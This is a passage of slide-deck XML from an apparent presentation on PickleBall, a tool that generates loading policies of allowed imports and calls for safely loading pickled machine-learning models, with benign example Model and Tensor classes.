              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__init__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, weights: Tensor):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.weights = weights</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        return (read_weights_to_tensor, (self.filename,))</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(filename: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>) -&gt; Tensor:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    # Read a weights file and return a Tensor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787" name="Google Shape;787;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Python library source code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Google Shape;788;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645325" y="2155500"/>
            <a:ext cx="2756700" cy="1293000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Invocations:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Google Shape;789;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5607550" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Generated loading policy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Google Shape;790;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532525" y="943025"/>
            <a:ext cx="4708200" cy="755100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A loading policy represents all callables that could appear in any pickle program encoding a valid model.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Google Shape;791;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243725" y="2528200"/>
            <a:ext cx="584400" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="792" name="Google Shape;792;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2673250" y="2366250"/>
            <a:ext cx="548700" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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96" name="Shape 796"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Generation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798" name="Google Shape;798;p65"/>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799" name="Google Shape;799;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="2155500"/>
            <a:ext cx="4708200" cy="1723800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
